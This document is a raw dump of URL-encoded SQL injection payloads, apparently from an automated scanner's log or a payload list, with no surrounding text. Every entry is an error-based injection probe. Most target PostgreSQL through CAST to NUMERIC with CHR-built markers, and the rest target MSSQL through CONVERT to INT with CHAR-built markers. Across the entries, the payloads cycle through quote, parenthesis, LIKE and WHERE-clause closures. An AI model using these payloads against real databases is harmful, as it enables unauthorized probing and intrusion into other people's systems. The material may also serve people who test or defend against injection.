-7248%29%29%20OR%205291%3DCAST%28%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285291%3D5291%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%283946%3D3946 -6348%29%29%29%20OR%205291%3DCAST%28%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285291%3D5291%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%28%288892%3D8892 -5143%20OR%205291%3DCAST%28%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285291%3D5291%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29 -3763%27%29%20OR%205291%3DCAST%28%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285291%3D5291%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%27vWoJ%27%3D%27vWoJ -2395%27%29%29%20OR%205291%3DCAST%28%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285291%3D5291%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%28%27EKBF%27%3D%27EKBF -3954%27%29%29%29%20OR%205291%3DCAST%28%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285291%3D5291%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%28%28%27JTRE%27%3D%27JTRE -8408%27%20OR%205291%3DCAST%28%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285291%3D5291%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%27DXME%27%3D%27DXME -2497%27%29%20OR%205291%3DCAST%28%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285291%3D5291%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%27BfRh%27%20LIKE%20%27BfRh -9266%27%29%29%20OR%205291%3DCAST%28%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285291%3D5291%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%28%27mecN%27%20LIKE%20%27mecN -7758%27%29%29%29%20OR%205291%3DCAST%28%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285291%3D5291%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%28%28%27JKBM%27%20LIKE%20%27JKBM -9935%27%20OR%205291%3DCAST%28%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285291%3D5291%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%27FbfL%27%20LIKE%20%27FbfL -4081%22%29%20OR%205291%3DCAST%28%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285291%3D5291%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%22pSrR%22%3D%22pSrR -8718%22%29%29%20OR%205291%3DCAST%28%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285291%3D5291%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%28%22zWme%22%3D%22zWme -5514%22%29%29%29%20OR%205291%3DCAST%28%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285291%3D5291%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%28%28%22OGcA%22%3D%22OGcA -9782%22%20OR%205291%3DCAST%28%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285291%3D5291%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%22oSAj%22%3D%22oSAj -6149%22%29%20OR%205291%3DCAST%28%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285291%3D5291%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%22UAPr%22%20LIKE%20%22UAPr -7074%22%29%29%20OR%205291%3DCAST%28%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285291%3D5291%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%28%22fbcW%22%20LIKE%20%22fbcW -3563%22%29%29%29%20OR%205291%3DCAST%28%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285291%3D5291%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%28%28%22whqo%22%20LIKE%20%22whqo -5014%22%20OR%205291%3DCAST%28%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285291%3D5291%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%22OBHX%22%20LIKE%20%22OBHX -5585%25%27%29%20OR%205291%3DCAST%28%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285291%3D5291%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%27%25%27%3D%27 -9253%25%27%29%29%20OR%205291%3DCAST%28%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285291%3D5291%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%28%27%25%27%3D%27 -1466%25%27%29%29%29%20OR%205291%3DCAST%28%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285291%3D5291%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%28%28%27%25%27%3D%27 -6713%25%27%20OR%205291%3DCAST%28%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285291%3D5291%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%27%25%27%3D%27 -9415%00%27%29%20OR%205291%3DCAST%28%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285291%3D5291%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%27ivWt%27%3D%27ivWt -8364%00%27%20OR%205291%3DCAST%28%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285291%3D5291%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%27oDEs%27%3D%27oDEs -9105%27%29%20WHERE%209047%3D9047%20OR%205291%3DCAST%28%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285291%3D5291%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20--%20 -1094%22%29%20WHERE%209121%3D9121%20OR%205291%3DCAST%28%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285291%3D5291%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20--%20 -2564%29%20WHERE%206426%3D6426%20OR%205291%3DCAST%28%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285291%3D5291%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20--%20 -8321%27%20WHERE%201345%3D1345%20OR%205291%3DCAST%28%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285291%3D5291%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20--%20 -6342%22%20WHERE%209679%3D9679%20OR%205291%3DCAST%28%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285291%3D5291%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20--%20 -1698%20WHERE%208850%3D8850%20OR%205291%3DCAST%28%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285291%3D5291%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20--%20 -9634%29%20OR%208648%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288648%3D8648%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29 -4984%27%29%20OR%208648%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288648%3D8648%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29 -3730%27%20OR%208648%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288648%3D8648%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29 -4434%22%20OR%208648%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288648%3D8648%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29 -8415%29%20OR%208648%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288648%3D8648%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%281726%3D1726 -5749%29%29%20OR%208648%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288648%3D8648%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%288860%3D8860 -8646%29%29%29%20OR%208648%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288648%3D8648%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%28%282341%3D2341 -4602%20OR%208648%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288648%3D8648%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29 -2448%27%29%20OR%208648%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288648%3D8648%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%27TouQ%27%3D%27TouQ -2698%27%29%29%20OR%208648%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288648%3D8648%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%28%27ZWob%27%3D%27ZWob -5280%27%29%29%29%20OR%208648%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288648%3D8648%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%27luFt%27%3D%27luFt -6287%27%20OR%208648%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288648%3D8648%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%27liYb%27%3D%27liYb -6753%27%29%20OR%208648%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288648%3D8648%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%27phuD%27%20LIKE%20%27phuD -1801%27%29%29%20OR%208648%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288648%3D8648%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%28%27WseE%27%20LIKE%20%27WseE -4941%27%29%29%29%20OR%208648%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288648%3D8648%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%27YImA%27%20LIKE%20%27YImA -1361%27%20OR%208648%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288648%3D8648%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%27YmCQ%27%20LIKE%20%27YmCQ -6420%22%29%20OR%208648%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288648%3D8648%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%22IbTc%22%3D%22IbTc -2246%22%29%29%20OR%208648%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288648%3D8648%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%28%22gqrs%22%3D%22gqrs -2275%22%29%29%29%20OR%208648%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288648%3D8648%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%22rogL%22%3D%22rogL -5618%22%20OR%208648%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288648%3D8648%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%22ZjIh%22%3D%22ZjIh -6044%22%29%20OR%208648%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288648%3D8648%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%22mLCE%22%20LIKE%20%22mLCE -3784%22%29%29%20OR%208648%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288648%3D8648%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%28%22oSxA%22%20LIKE%20%22oSxA -7999%22%29%29%29%20OR%208648%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288648%3D8648%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%22QHtT%22%20LIKE%20%22QHtT -6593%22%20OR%208648%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288648%3D8648%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%22BqnS%22%20LIKE%20%22BqnS -3242%25%27%29%20OR%208648%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288648%3D8648%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%27%25%27%3D%27 -4057%25%27%29%29%20OR%208648%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288648%3D8648%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%28%27%25%27%3D%27 